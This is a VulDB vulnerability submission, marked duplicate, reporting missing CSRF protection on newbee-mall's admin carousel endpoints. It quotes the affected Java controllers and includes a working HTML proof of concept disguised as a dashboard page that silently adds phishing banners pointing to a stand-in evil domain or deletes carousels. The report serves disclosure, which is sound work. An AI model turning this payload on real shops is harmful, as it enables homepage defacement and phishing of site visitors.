Submit #752806: newbee-ltd newbee-mall v1.0 CSRFinfo

Titelnewbee-ltd newbee-mall v1.0 CSRF
Beschreibung# CSRF Vulnerability in Admin Carousel Management ## Summary A **CSRF vulnerability** exists in the admin carousel (banner) management endpoints. Attackers can modify, delete, or add carousel images on the mall homepage, potentially displaying malicious content or phishing links to all site visitors. ## Vulnerability Details ### Configuration-Level Issue **File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java` ```java @Configuration public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer { public void addInterceptors(InterceptorRegistry registry) { registry.addInterceptor(adminLoginInterceptor) .addPathPatterns("/admin/**"); // ❌ No CSRF protection for admin operations } } ``` ### Endpoint-Level Code Analysis **File**: `src/main/java/ltd/newbee/mall/controller/admin/NewBeeMallCarouselController.java` The controller contains multiple vulnerable endpoints: ```java // Add carousel @PostMapping("/carousels/save") @ResponseBody public Result save(@RequestBody Carousel carousel) { // ❌ No CSRF token validation // ⚠️ Can add malicious banners with phishing links } // Update carousel @PutMapping("/carousels/update") @ResponseBody public Result update(@RequestBody Carousel carousel) { // ❌ No CSRF token validation // ⚠️ Can modify existing banners } // Delete carousel @DeleteMapping("/carousels/delete") @ResponseBody public Result delete(@RequestBody Integer[] ids) { // ❌ No CSRF token validation // ⚠️ Can remove all homepage banners } ``` **Security Issues**: 1. ❌ No CSRF token validation on any carousel operations 2. ⚠️ Can inject malicious image URLs 3. ⚠️ Can add phishing links to redirect URL 4. ⚠️ Affects all site visitors ## Proof of Concept (PoC) ```html <!DOCTYPE html> <html> <head> <title>Admin Dashboard Update</title> </head> <body> <h2>???? Updating dashboard metrics...</h2> <p>Please wait...</p> <script> // Add malicious carousel with phishing link fetch('http://localhost:28089/admin/carousels/save', { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ carouselUrl: 'https://evil-phishing-site.com/fake-login', redirectUrl: 'https://evil-phishing-site.com/steal-credentials', carouselRank: 1, // Display first isDeleted: 0 }) }) .then(response => response.json()) .then(data => { document.body.innerHTML = '<h3>✅ Dashboard updated!</h3>'; }); // Alternative: Delete all existing carousels /* fetch('http://localhost:28089/admin/carousels/delete', { method: 'DELETE', credentials: 'include', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify([1, 2, 3, 4, 5]) // Delete IDs 1-5 }); */ </script> </body> </html> ``` ## Impact **Homepage defacement and mass phishing attack** - Attackers can display malicious banners to all site visitors, leading to widespread phishing attacks and brand reputation damage. --- **CVSS Score**: 7.8 (High)
Quelle⚠️ https://github.com/newbee-ltd/newbee-mall/issues/115
Benutzer
 flashzyc (UID 92850)
Einreichung05.02.2026 12:00 (vor 4 Monaten)
Moderieren18.02.2026 07:56 (13 days later)
StatusDuplikat
VulDB Eintrag346456 [newbee-ltd newbee-mall bis a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints Cross Site Request Forgery]
Punkte0

ZurückÜbersichtWeiter

Do you want to use VulDB in your project?

Use the official API to access entries easily!